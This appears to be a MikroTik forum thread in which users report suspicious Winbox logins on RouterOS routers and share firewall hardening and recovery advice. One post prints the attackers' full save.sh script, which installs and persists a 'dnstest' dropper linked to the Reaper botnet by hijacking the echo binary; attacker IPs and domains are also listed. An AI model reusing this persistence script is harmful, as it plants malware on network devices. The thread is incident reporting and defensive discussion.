I noticed today an unusual login to my router exposed to external ip.
Router had only winbox 8129, ssh on the changed high port and pptp on the default port. Version 6.41.3
The password is random char + numbers + special chars and nowhere else used.

Login to my router:


I updated it to the latest version and downloaded it completely from the outside.

Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help in something:
save.sh dnstest is a binary file, I can send after contact on pw.


This is not the only case, this is log from my friend. He got only exposed winbox:


It looks like the first attempt to log in - here somewhere miraculously collects passwords from the router and later logging in with user perm = full.

IP:
103.1.221.39
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]

Hi, do you have any firewall setting in your Mikrotik?
You can have a white list ip address to access winbox, by just changing the port for winbox in the services doesn’t mean no one can try to connect to, as well as you can have a black list for the ip that login with login failure, if you don’t have a firewall filter rules, I can send you a default one, with a bit tweaked.

Yes, i got firewall, but winbox port was exposed in the internet.
From it the attack came.

This looks interesting ... scary interesting.

Send everything to support@mikrotik.com. They will probably notice it here, and if it's real, it will get to them from elsewhere too, but the sooner they get the info, the better.

If true, this is a very serious vulnerability and you should report it directly to Mikrotik support so they can fix it ASAP.

Btw, a basic security precaution is to remove or rename the "admin" user and use a different name entirely. There is nothing special about the "admin" name. In this case, it may not be relevant since they logged in with so few attempts.

Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.

Hello everyone,

The same thing happened to me today.



What's happening mikrotik team?
Any security problem not notified?
bug or backdoor?

AS131149 103.1.220.0/23 LJ Hosting Co., LTD

Yes, i got firewall, but winbox port was exposed in the internet.
From it the attack came.

Interesting, and by any chance did you used admin as a user or it was changed?

I think the best way is use whitelist and netinstall the Router.

But before doing that send a supout file to mikrotik.

And the last thing, use strong ssh key.

I just checked most of my Routers, all was ok (6.40.7), but one of them on 6.41.3 had too much attacked but I had rule to collect and block them, no login was established, I believed it a bug in 6.41.3 in firewall filter, I had a whitelist for inbox but looks like it wasn't working, or somehow other rules below it was giving access to any ip to connect to which shouldn't.

just to stop the attackers, create a whitelist IP address for example call Support and the the raw firewall

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support

I have already notified the mikrotik support, I could not send the support file because the router is blocked.
@normis, mikrotik team can you check this immediately?
this is very serious.

just to stop the attackers, create a whitelist IP address for example call Support and the the raw firewall

/ip firewall raw
add action=drop chain=prerouting dst-port=22,80,8291 log=yes protocol=tcp src-address-list=!Support

Hello,
I had configured that at 3 attempts d access blocked the ip, but have entered the first with a key of numbers, signs, uppercase and lowercase letters. It is clear that it is a very serious bug that does not require any effort to gain control of the router.

Good catch. Will be interesting to get more details. Unfortunately vulnerabilities are a fact of life these days. For the last ten years I only allow trusted IPs access to Winbox & SSH. Its never a good idea to expose unnecessary things to the Internet in hopes that they will be resilient enough to ward off the ever so persistent probes and attacks. And changing port numbers helps to a point. I suppose if you use a good port scan blocker in your firewall you may be lucky and detect them before they find you. Its always better to restrict to specific networks or only allow access from VPN.

Looks like Mikrotik has sold good engough to become a very promising attack target for the bad guys.

I run an average network (Public C-Network) and I have an average of 215.000 tried attacks per day.
Thats about 2.5 attacks a second. I guess its a good thing to ramp up security and block SSH, HTTP, FTP and especially WINBOX so attackers have no hint that you are using Mikrotik devices.

Do we even know if mikrotik closed this door with 6.42???

Do we even know if mikrotik closed this door with 6.42???

Likely not as it seems to be a new issue. So disable access to Winbox from the internet, and even better restrict it to just a few addresses from the LAN, until it becomes clear.

1.Set user name and password with combination with cyrillic alphabet after that remoove or disable user - admin !
2.Change the port numbers for ssh , winbox etc.
3.Set strog crypto for ssh
4.Set ACL
5.Set 3 attempts login to black list and deny attempts with RAW
6,Disable all other non-useable services
Finaly connect the cable to wan ethernet port!

1.Set user name and password with combination with cyrillic alphabet after that remoove or disable user - admin !
2.Change the port numbers for ssh , winbox etc.
3.Set strog crypto for ssh
4.Set ACL
5.Set 3 attempts login to black list and deny attempts with RAW
6,Disable all other non-useable services
Finaly connect the cable to wan ethernet port!

In point 1 you're wrong, just like the password type, I had a password of type "@ _23UbakJav!2947!#6hasd! - +)" and they have entered with a single attempt, it is something more serious that lets you see the key, only way to close all the ports to the computers on the LAN.

I had the same visit on three different days...









I noticed that it is from the day after the update 6.42 .... randomness ???

I have set the due rules... I hope!!!!!!

Can you please upload the 'dnstest' binary? Might provide some clues as to what's going on..

password: mikrotik

In point 1 you're wrong, just like the password type, I had a password of type "@ _23UbakJav!2947!#6hasd! - +)" and they have entered with a single attempt, it is something more serious that lets you see the key, only way to close all the ports to the computers on the LAN.

Where is the Cyrillic alphabet/s/?

BTW - interesting afternoon - 62 attempts (unique IPs) on ports 22,23,80,8291 within last 3 hours, never seen such wave before....

Where is the Cyrillic alphabet/s/?

Why do you think that a password using cyrillic alphabet would be safer than a complex one in pure ASCII, given that there was obviously no brute force attack on the password so the attack must use some security hole bypassing the password authentication or some default password? If so many people would let their complex ASCII passwords leak, it's equally likely that cyrillic passwords could be leaked as well, so it is again no protection. Using exotic alphabets makes dictionary attacks much harder but not those which either don't need a password at all or obtain the correct one some other way.

@Joe1vm ... only 62 ....
"My" past few days: 56k+ tries ......
Winbox section drops specified ports and makes list of IP which try for the 2+ times to access that ports.
Same for RAW section which do same for sbl lists. If it is already in RAW list then drop it early to avoid checking 20k+ entries of sbl lists. Second pisture comes from other router. Last hour ... 87 different IPs scanning my router

Can someone please advice how to check if the router has save.sh and dnstest files? Where are these files saved?

I have been making too many config changes, so unsure something slipped through the cracks.

My winbox, ssh, telnet etc are only accessible from LAN IP ranges but I have PPTP server running. I can see in the log it says lot of established tcp connections for pptp. Is that an issue? This is good right? Do I still need to add firewall rules to close ports?
Thanks!

password: mikrotik

Thanks!

dnstest is actually a dropper, it downloads and executes an additional executable which seems to be related to the Reaper botnet: IoT_reaper: A Rappid Spreading New IoT Botnet

It doesn't provide any clue as to how you were infected though.

Can someone please advice how to check if the router has save.sh and dnstest files? Where are these files saved?

They're supposed to end up in /flash/bin/ according to the save.sh script - you can't access them there.

Do I still need to add firewall rules to close ports?

Add an OUTPUT LOG rule for 162.212.182.119. If it hits you're infected. And block Winbox while noone knows what's going on.

We are sorry to hear that you have experienced such problem. Until now we were not aware about any problems with Winbox and possibility to gain access to your router by using this service. We are now working in order to find out what happened here.

Thank you for those of you who contacted support directly. Those of you who did not, please write to support@mikrotik.com and:

1) Tell RouterOS version which was installed on your device;
2) Tell if Winbox port was protected or anyone could access it;
3) Tell if you did use username admin or was it changed to any other name besides this default name;
4) Tell if password was secure and was not too simple like, for example - "password";
5) Was Winbox configured on default port or port was changed under IP/Services to other value.

While we are looking into this problem:

1) Protect your device (any service) from attacks by using firewall. If you definitely need an open access for some service then either whitelist IP or domain name or use port knocking;
2) Make sure that there is no user called admin on your router configured;
3) Make sure that you change passwords for all the users if there is a chance that your device was affected;
4) Make sure that you are running latest RouterOS version to be sure that this is not a problem which is already resolved in the past.

@Strods: Make sure that there is no user called admin on your router configured

A lot of us create a new user with that replaces the user Admin and then just disable the user Admin and leave them on the box, but deactivated? Is it better to remove user Admin in case that could be still an attack vector?

2) Make sure that there is no user called admin on your router configured;
4) Make sure that you are running latest RouterOS version to be sure that this is not a problem which is already resolved in the past.

User admin WAS REMOVED FROM THIS ROUTER. Version 6.41.3

I managed to royally screw up my access to the router while applying new security firewall rules. Now I have no access - IP or MAC. Any recommendation to get my access back and delete the RAW firewall rule I just put in? I can't afford to reset it because of unfinished documentation (my fault). Thanks!

I managed to royally screw up my access to the router while applying new security firewall rules. Now I have no access - IP or MAC. Any recommendation to get my access back and delete the RAW firewall rule I just put in? I can't afford to reset it because of unfinished documentation (my fault). Thanks!

If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect an usb to serial converter.

If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect an usb to serial converter.
[/quote]

It's a 3011, there is an RJ45 serial console and a USB port. Is it possible to delete one line from firewall through any of these? Thanks

If even MAC access doesn't work, game over unless you have a serial port on board or a USB port to which you could connect an usb to serial converter.

It's a 3011, there is an RJ45 serial console and a USB port. Is it possible to delete one line from firewall through any of these? Thanks

If you have a serial port on your PC or can provide it using a USB to serial converter, and you either have the RJ-45/DB-9 serial cable or are able to put it together, or you have a "null modem" cable/adaptor and (another) USB to serial converter, then yes, this is the way. You connect to the Mikrotik using any serial terminal software with your normal userame and password and the RouterOS command line is exactly the same like when you connect using ssh or telnet.

RJ45 serial pinouts are not standardized, so make sure you use a Mikrotik-compatible one.

Thanks sindy; just one more question. Can I access the serial console while the router is in its normal running state? This is a production router and it is not possible for me to turn it off or disconnect it easily.

I am sure I have a null modem cable lying around somewhere; haven't had to use one in 10 years or so I think the one I have is a DB-9 to DB-9.

Edit: Ok, found it. DB-9 to DB-9 null modem cable and also found the DB-9 to usb converter to go with it. Hopefully this will go smooth tomorrow.

Until we know more, Firewall the Winbox port for unknown IP addresses.
Email any useful information to support@mikrotik.com

Thank you. We are working on it.

Thanks sindy; just one more question. Can I access the serial console while the router is in its normal running state? This is a production router and it is not possible for me to turn it off or disconnect it easily.

I am sure I have a null modem cable lying around somewhere; haven't had to use one in 10 years or so I think the one I have is a DB-9 to DB-9.

Edit: Ok, found it. DB-9 to DB-9 null modem cable and also found the DB-9 to usb converter to go with it. Hopefully this will go smooth tomorrow.

If I had time till tomorrow, I'd myself put together the RJ-45 to DB-9 cable. I don't know your software version and I have got no machine with an embedded serial port, so I'm not sure whether the USB serial port becomes a console one even if a console port already exists in the system and whether your version handles connection of USB to serial converter on the fly (I had some issues when connecting and disconnecting two different USB to serial converters several times.

Apparently the light blue Cisco cable is directly compatible if you have one. Don't know how easily electronic parts are available in your part of the world, but if you don't trust yourself when it comes to use of a soldering iron, there are crimp-type DB-9 available, and the DB-9-to-RJ-45 adaptors are also sold "unconfigured" so you can use a LAN cable and this adaptor and you're good.

And check your terminal software first - connect pins 2 and 3 on the DB-9 and see that what you type on the keyboard appears on the screen when they are connected and doesn't when they are not.

If I had time till tomorrow, I'd myself put together the RJ-45 to DB-9 cable.
Apparently the light blue Cisco cable is directly compatible if you have one.

I think we have Cisco compatible rollover cable hidden away in a cupboard somewhere in the store room; will have to look for it tomorrow.

I don't thnk my DB9 cable and usb converter can be used without some surgery. We do have such expertise(electronics+mechatronics+electrical+controls) in-house if I need it. I could be reasonably dangerous with a soldering iron if it comes to that.

I am confident our old Dell laptop with Windows 2000 will still work so we have HyperTerminal and serial port available. I can still sleep peacefully knowing if I can't get in, no one else could either; hopefully

Thanks for your valuable advice.

I noticed today an unusual login to my router exposed to external ip.
Router had only winbox 8129, ssh on the changed high port and pptp on the default port. Version 6.41.3
The password is random char + numbers + special chars and nowhere else used.

Login to my router:


I updated it to the latest version and downloaded it completely from the outside.

Fortunately, I found two files: save.sh and dnstest.
Maybe their content will help in something:
save.sh

Code: Select all

#!/bin/ash
case "$PATH" in
*/usr/local/bin*)
# old versions
dest="/usr/local/bin/"
;;
*)
dest="/flash/bin/"
if [ ! -d "/flash/" ]; then
exit 1
fi
;;
esac


if [ -f $dest/.dnstest ]; then
rm $dest/.dnstest
fi
if [ -f $dest/echo ]; then
rm $dest/echo
fi
if [ -f $dest/.test ]; then
rm $dest/.test
fi

mkdir -p $dest

export PATH=$PATH:$dest
chmod a+x /flash/rw/pckg/dnstest
cp /flash/rw/pckg/dnstest $dest/.dnstest

echo -e "#!/bin/ash\nusleep 180000000\ncp $dest.dnstest /tmp/.dnstest\n/tmp/.dnstest*" > $dest/.test
chmod +x $dest/.test

echo -e "#!/bin/ash\n/$dest.test&\n/bin/echo \$*" > $dest/echo
chmod +x $dest/echo
/flash/rw/pckg/dnstest
rm save.sh

dnstest is a binary file, I can send after contact on pw.


This is not the only case, this is log from my friend. He got only exposed winbox:


It looks like the first attempt to log in - here somewhere miraculously collects passwords from the router and later logging in with user perm = full.

IP:
103.1.221.39
marchdom4.com [162.212.182.119]
march10dom5.com [162.212.182.119]

For Security always changes the default ports of service: Winbox, Api


Enviado desde mi iPhone utilizando Tapatalk

Also, in general there should be no public facing remote router administration service. Best is to use a VPN. Next best is to allow login on Winbox or SSH only from specific IPs.

The VPN still requires exposing to the internet. Given how Mikrotik writes their own VPN daemons, I don't see how a VPN would be more secure than winbox given that almost every Mikrotik daemon seems to have some kind of security bug lately. Hopefully this turns out to be something more mild like a compromised admin PC (eg auto updating winbox is extremely insecure - attacker can send any .exe to be run on your PC) and not a vulnerability in winbox itself.

Update: Checked all my routers with exposed 8291 and nothing untoward in the logs or connections. However winbox only seems to record a log on a successful or failed auth, if this is really an exploit in the daemon (as evidenced by attempt to run a shell script and an executable), such a compromise might not even be logged, and if the malware is stealthy it may never even be visible to the admin post-exploit, since it could trivially erase logs and such. This is another reason why admins should have shell access, without it it's impossible to run forensics checks for the presence of such malware.

Update 2: I've been monitoring connection attempts to 8291 with ~30 IPs, not a single SYN packet in the last two hours, so doesn't look like there's a worm or mass scan going on.

Do any of these affected routers have the UPnP service enabled at all, including on LAN?

Hi Mikrotik Team,

We also observed this issue on some of our Devices, even if the hacked account is not 'admin'.


The Device is RB1100AHx2 with RouterOS v6.41.4!

Kindly help us to check this vulnerability soon.

Thanks!

Everyone who seems to be affected (did see failed login attempts from unknown IP which in the end resulted in successful login attempt) and did see these files created on the router - please write to support@mikrotik.com. Send to us supout file from your router. If it would be possible to get remote access to your router, then it would be the best way how we can try to determine in what way attacker did gain access to your router.

Are all these attacks coming from the same source?

103.1.221.39

@mikrotik
Maybe it's time to issue a warning to main page of Forum?

On Czech forum: https://ispforum.cz/viewtopic.php?p=228818#p228818
On Polish forum: https://www.trzepak.pl/viewtopic.php?f=26&p=487659